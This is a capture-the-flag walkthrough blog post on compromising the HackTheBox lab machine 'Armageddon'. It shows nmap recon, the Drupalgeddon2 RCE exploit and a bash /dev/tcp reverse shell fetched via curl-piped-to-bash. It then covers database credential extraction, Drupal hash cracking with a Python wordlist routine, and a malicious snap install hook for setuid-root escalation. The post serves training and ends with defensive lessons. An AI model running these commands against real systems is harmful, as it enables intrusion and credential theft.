This is my 2nd blog post and a step on my OSCP journey…
“Armageddon” is a retired box from HackTheBox (14/200)
Let's start pwning it ❗️
Reconnaissance
The first thing we do against the box is scan its ports with nmap.
nmap -sC -sV 10.10.10.233 -oN nmap.txt
- -sC: run the default NSE scripts for every open port it finds
- -sV: probe each port to identify the service and its version
- -oN: save the normal (human-readable) output to a file
The scan shows Apache serving a website on port 80, so let's check the website. SSH is also running on port 22.
Enumeration
Viewing the page source shows the site runs the Drupal CMS, which matches what nmap's default scripts reported. Reading up on Drupal, we find its directory layout is public documentation, so we know which files to go looking for.
nmap also reported a robots.txt file, so let's check it.
Look Look!! 😜
robots.txt lists a “CHANGELOG.txt” file, which may disclose the Drupal version, so let's check it.
CHANGELOG.txt shows the site runs Drupal 7.56. The next step is to find an exploit for this version, so,
LETS GOOGLE!! 😃
We find the exploit: Drupalgeddon2, CVE-2018-7600 / SA-CORE-2018-002, an unauthenticated remote code execution bug in Drupal 7 that was fixed in 7.58, so 7.56 is vulnerable.
We git-clone the exploit and run it.
python3 drupa7-CVE-2018-7600.py http://10.10.10.233 --command='whoami'
whoami comes back as “apache”, the web server's user, so the exploit works and we have command execution as that user. The next step is to turn it into a shell.
For that we take a bash reverse-shell one-liner from PayloadsAllTheThings, save it as index.html, and have the victim fetch and execute it.
bash -c 'bash -i >& /dev/tcp/LHOST/LPORT 0>&1'
- -c: read the commands from the string that follows instead of from standard input
- -i: run the inner bash interactively, so we get a prompt over the connection
- >& /dev/tcp/LHOST/LPORT 0>&1: bash opens a TCP connection to our listener and points stdout, stderr and stdin at it
Now we use three terminals, T1, T2 and T3.
- T1: runs the exploit with a command that curls index.html from our web server and pipes it into bash
- T2: listens for the reverse shell on port 443 (the LPORT in the payload)
nc -lvnp 443
- T3: serves index.html over HTTP on port 80 (Python 2's SimpleHTTPServer; on Python 3 the equivalent is the http.server module)
python -m SimpleHTTPServer 80
As soon as the T1 command curls index.html and pipes it into bash, the listener in T2 gets our reverse shell as apache. Next we enumerate further and escalate privileges.
Privilege Escalation
We already know Drupal keeps its data in a MySQL database, so we look for the configuration file that holds the database username and password. A quick search shows Drupal stores it in sites/default/settings.php under the web root, so let's check settings.php.
settings.php gives us the database username and password.
Next we query the database for Drupal user names and password hashes.
Interacting with MySQL database
mysql -u drupaluser --password=CQHEy@9M*m23gBVj -e 'show databases'
- -u: username
- --password: password, given inline (with -p alone mysql prompts for it, which keeps it out of the shell history)
- -e: execute the statement and exit
The list MySQL returns includes a “drupal” database, so we enumerate its tables.
mysql -u drupaluser --password=CQHEy@9M*m23gBVj -D drupal -e 'show tables'
Of all the tables, users is the one we care about. Running describe users lists its columns, and from those we pull what is hiding behind them.
Four columns matter to us, uid, name, pass and login, so we select only those: SELECT uid,name,pass,login FROM users
Let's see what this returns.
Now we have a username and its password hash. The next step is to crack it with hashcat, but first we need to identify the hash type.
Knowing the type and cracking hash
hashcat --example-hash | less
then search for the hash's leading characters by typing /\$S\$ in less. The $S$ prefix is Drupal 7's own format (a phpass-style salted, iterated SHA-512), which hashcat lists as mode 7900.
Knowing the mode is 7900, we save the hash in a file called hashes and run hashcat with rockyou.txt as the wordlist. The wordlist is a positional argument; -w is hashcat's workload-profile option and takes a number, not a path, so it must not be put in front of the wordlist.
hashcat -m 7900 hashes /usr/share/wordlists/rockyou.txt
Yayy❗ The hash cracks and the credentials are brucetherealadmin:booboo
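Since the hash itself only appears in a screenshot, here is what a $S$ hash is made of, as an added example (not the page's hash, and not Drupal's code, though it follows the algorithm in Drupal 7's includes/password.inc): a pure-Python port of Drupal 7's password hashing that reads the cost from the prefix, verifies a candidate password, and runs the same loop hashcat -m 7900 runs over a small wordlist. The demo hash and three-word list are constructed here; the salt is random on every run.

```python
"""Drupal 7 password hashes ('$S$...'): identify, verify and wordlist-check them.
Added example following the algorithm in Drupal 7's includes/password.inc;
the demo hash and mini wordlist are constructed here, not taken from the box."""
import hashlib
import os

# Drupal's crypt-style base-64 alphabet (_password_itoa64()).
ITOA64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
HASH_LENGTH = 55            # DRUPAL_HASH_LENGTH: stored hashes are cut to this
MIN_LOG2, MAX_LOG2 = 7, 30  # DRUPAL_MIN_HASH_COUNT / DRUPAL_MAX_HASH_COUNT
DEFAULT_LOG2 = 15           # DRUPAL_HASH_COUNT: 2**15 SHA-512 rounds by default
HASHCAT_MODE = 7900         # hashcat's "Drupal7" mode


def _b64(data: bytes) -> str:
    """Port of _password_base64_encode(): 3 bytes -> 4 chars, no padding."""
    out, i, n = [], 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3f])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3f])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3f])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3f])
    return ''.join(out)


def identify(hash_str):
    """Return (label, hashcat_mode, log2_rounds, salt) for a '$S$' hash.
    Layout: '$S$' + cost char + 8-char salt + 43 chars of truncated digest."""
    if not hash_str.startswith('$S$') or len(hash_str) != HASH_LENGTH:
        raise ValueError('not a Drupal 7 $S$ hash')
    log2 = ITOA64.index(hash_str[3])
    if not MIN_LOG2 <= log2 <= MAX_LOG2:
        raise ValueError('cost outside Drupal bounds')
    return ('Drupal 7, SHA-512 x %d' % (1 << log2), HASHCAT_MODE, log2, hash_str[4:12])


def drupal7_hash(password, setting):
    """Port of _password_crypt('sha512', password, setting).
    'setting' is any string whose first 12 chars are '$S$' + cost + salt,
    so an existing hash can be passed in directly to re-compute it."""
    if len(password) > 512:          # Drupal refuses huge passwords (DoS guard)
        raise ValueError('password too long')
    setting = setting[:12]
    log2 = ITOA64.index(setting[3])
    salt, pw = setting[4:12].encode(), password.encode()
    digest = hashlib.sha512(salt + pw).digest()
    for _ in range(1 << log2):       # do { } while (--$count): exactly 2**log2 rounds
        digest = hashlib.sha512(digest + pw).digest()
    return (setting + _b64(digest))[:HASH_LENGTH]


def new_hash(password, log2=DEFAULT_LOG2):
    """What user_hash_password() stores: fresh 6-byte salt, default cost."""
    return drupal7_hash(password, '$S$' + ITOA64[log2] + _b64(os.urandom(6)))


def check(password, hash_str):
    """user_check_password(): re-hash with the stored setting and compare."""
    return drupal7_hash(password, hash_str) == hash_str


def wordlist_attack(hash_str, words):
    """The loop hashcat -m 7900 runs, minus the GPU: first hit wins."""
    return next((w for w in words if check(w, hash_str)), None)


if __name__ == '__main__':
    demo = new_hash('booboo')                      # constructed, not the box's hash
    print(demo, identify(demo))
    print(wordlist_attack(demo, ['123456', 'password', 'booboo']))
```

Two things worth taking from this: the fourth character encodes the cost (Drupal 7's default 'D' means 2**15 rounds, which is why hashcat is slower per guess here than on raw MD5 but still gets through rockyou.txt quickly for a six-letter word), and the 43-character tail is a truncated digest, so a cracker must reproduce the whole salt-and-iterate routine rather than compare against a plain SHA-512.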
Privilege Escalation to root
Next we log in over SSH (port 22) as this user.
Notice!! We have captured the 🏁 user flag.
To get root we first check which commands this user may run with sudo:
sudo -l
- sudo: “superuser do”, runs a command as another user (root by default) according to the rules in /etc/sudoers
- -l: lists the commands the invoking user is allowed to run through sudo
O my! O my! Look what we've found: this user may run snap install through sudo. snap is a package manager, and a snap can ship an install hook that snapd executes as root while the package is being installed, so the plan is to build a malicious snap and install it with this sudo rule. First we build a harmless snap following the GTFOBins recipe on our machine and install it on the victim to confirm the hook really runs as root.
Creating simple .snap package
These commands, run on our machine, build a plain snap named “xxxx_1.0_all.snap” whose install hook only reports which user it ran as, so installing it on the victim tells us whether hooks execute as root.
Two terminals again: the bottom one serves the freshly built snap from our machine over HTTP, and the top one, on the victim, downloads it and saves it as safe.snap.
Now we install the package with the GTFOBins command (sudo snap install with --dangerous, because the snap is unsigned, and --devmode) and see what happens.
The hook ran as root, so any command we put into the install hook runs as root. Our plan is a root shell: find where bash lives, copy it into our home directory, and have the hook turn that copy into a setuid-root binary.
Let's find bash and copy it into the current directory.
bash is owned by root; our copy in the home directory is owned by brucetherealadmin. Now we craft the command the install hook will run against that copy when the snap is installed.
Creating a malicious .snap package
The hook uses chown to hand the copy back to root and chmod to set the setuid bit, so that when brucetherealadmin executes it, it runs with root as its effective uid:
chown root:root /home/brucetherealadmin/bash;chmod 7455 /home/brucetherealadmin/bash
The leading 4 of a mode is the setuid bit; 7455 as written also sets setgid and sticky and leaves the owner with no execute bit, which does not matter here because brucetherealadmin is matched by the “other” class (r-x), but 4755 is the conventional mode for this trick. With the malicious snap rebuilt around this command, we repeat the same transfer-and-install steps on the machine and see what happens next.
Same steps as before. Two things to notice: snap reports the install hook exiting with status 1, because the GTFOBins hook deliberately ends with false so the install aborts and nothing stays installed, but by then chown and chmod have already run as root; and ls now lists the bash copy in red, the default ls colouring for setuid-root executables, meaning it will give us root when we execute it. To use it we need to run:
bash -p
-p tells bash to keep its effective uid (root); without it, bash sees that euid differs from uid and drops back to brucetherealadmin. Notice!! We have captured the 🚩 root flag.
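To see why the mode in the hook matters, and why the 7455 used above worked even though 4755 is the usual choice, here is an added Python model of the permission check the kernel makes on exec() and of what bash -p preserves. This is illustrative code written for this page, not anything from the box, snapd or bash; uid 1000 for brucetherealadmin is an assumption, and the model ignores capabilities, nosuid mounts and LSMs.

```python
"""Why the chown/chmod in the snap hook yields a root shell: model the
permission check the kernel makes on exec() and the uid the new process
gets, then the extra step that bash -p is needed for.  Added example; uids
and modes are illustrative, and capabilities, nosuid mounts and LSMs are
ignored."""
import os
import stat


def symbolic(mode):
    """Render permission bits the way ls -l shows them (0o4755 -> 'rwsr-xr-x')."""
    return stat.filemode(stat.S_IFREG | mode)[1:]


def exec_check(mode, owner_uid, owner_gid, caller_uid, caller_gids):
    """Return (may_exec, effective_uid) for caller running a file with `mode`.

    Exactly one permission class applies, in order: owner, then group, then
    other.  A non-owner never benefits from the owner bits, which is why
    mode 7455 (owner r--) still works for a non-root user: that user falls
    into 'other', and other has r-x.  If the setuid bit is set the new
    process runs with the file owner's uid as its effective uid."""
    if caller_uid == 0:
        may_exec = bool(mode & 0o111)           # root only needs some x bit
    elif caller_uid == owner_uid:
        may_exec = bool(mode & stat.S_IXUSR)
    elif owner_gid in caller_gids:
        may_exec = bool(mode & stat.S_IXGRP)
    else:
        may_exec = bool(mode & stat.S_IXOTH)
    if not may_exec:
        return False, caller_uid
    euid = owner_uid if mode & stat.S_ISUID else caller_uid
    return True, euid


def bash_euid(euid, uid, privileged_mode):
    """bash resets euid to the real uid when they differ, unless started with -p."""
    return euid if privileged_mode or euid == uid else uid


def inspect(path, caller_uid=1000, caller_gids=(1000,)):
    """Read the bits off a real file (e.g. the bash copy in the home directory)
    and report what the assumed caller would get from executing it."""
    st = os.stat(path)
    mode = stat.S_IMODE(st.st_mode)
    may_exec, euid = exec_check(mode, st.st_uid, st.st_gid, caller_uid, list(caller_gids))
    return {'mode': symbolic(mode), 'owner_uid': st.st_uid,
            'setuid': bool(mode & stat.S_ISUID), 'may_exec': may_exec, 'euid': euid}


if __name__ == '__main__':
    bruce = 1000                                    # assumed uid for brucetherealadmin
    for mode in (0o755, 0o4755, 0o7455):
        ok, euid = exec_check(mode, 0, 0, bruce, [bruce])
        print('%s root:root -> exec=%s euid=%d; plain bash euid=%d; bash -p euid=%d'
              % (symbolic(mode), ok, euid,
                 bash_euid(euid, bruce, False), bash_euid(euid, bruce, True)))
```

Run against the copied bash with inspect('/home/brucetherealadmin/bash') after the snap install, the 'setuid' and 'euid' fields tell you before typing anything whether the hook did its job; the bash_euid line is the reason a plain ./bash would silently hand the root euid back.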
Lesson Learned
- Never leave web applications outdated; keep an eye on them and patch promptly. The fix for this Drupal bug shipped in 7.58, and the unpatched 7.56 handed an attacker a shell.
- Protect sites/default/settings.php. Drupal needs that file, but it holds the database credentials, so keep its permissions tight and assume a web-server compromise exposes it. The real damage here was that the database held a password (“booboo”) that rockyou.txt cracked in seconds and that was also valid for SSH: enforce strong passwords and never reuse them across services.
- Do not give users sudo rights to snap install (or any package manager): a malicious package's install hook runs as root, so letting someone install packages is letting them become root.
— — — — — — — — — —KHTAM — — — — — — — — — —
1ogicbr0 💀